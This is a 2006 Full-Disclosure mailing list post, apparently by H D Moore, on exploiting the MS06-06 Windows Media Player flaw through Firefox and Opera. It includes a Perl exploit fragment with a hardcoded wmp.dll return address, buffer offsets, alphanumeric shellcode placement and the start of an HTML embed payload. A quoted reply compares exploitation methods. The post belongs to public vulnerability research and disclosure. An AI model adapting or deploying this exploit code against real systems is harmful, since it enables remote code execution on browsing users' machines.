[Full-disclosure] MS06-06 Windows Media Player Exploitation
H D Moore
fdlist at digitaloffense.net
Fri Feb 17 01:41:05 GMT 2006

Got it working finally :-) The alpha shellcode stuff is actually
Skylined's (ported to perl), the non-alpha prefix is only used if you
don't pass GETPCTYPE=win32 for PexAlphaNum or GETPCTYPE=seh for Alpha2. I
am using an address in wmp.dll (v9) and tested it successfully on Firefox
and Opera. Time to start porting to v10 and have it auto-detect the WMP
version. Keep your SRC path less than 4K or you end up smashing the PEB's
module list pointers (at least with Firefox)...

my $addr = 0x07694b1e; # wmp.dll v9.00.00.2980
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $pattern = Pex::Text::AlphaNumText(4096);
substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr]
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($shellcode), $shellcode);
my $content = "<html><body><embed type=\"application/x-mplayer2\"

On Thursday 16 February 2006 19:15, c0ntex wrote:
> On 16/02/06, H D Moore <fdlist at digitaloffense.net> wrote:
> > Still getting some annoying crashes (SEH trick in alphanum code is
> > annoying when you are trying to debug something...), but the basic
> > solution is:
> Ye, we are on the same path if you looked at my notes, SEH works
> flawlessly and can redirect no problem, but getting the stable
> location to have it go is the problem. I had to reject the "pass
> shellcode in the src="" method as I am finding your Alpha shellcode
> sketchy and not 100% alpha :p due to the FF and other annoying
> characters, which cause it to bork.
> I'm working on another method which is looking more realistic but I
> need to wait til tomorrow now as I need to sleep :)

Full-Disclosure is hosted and sponsored by Secunia.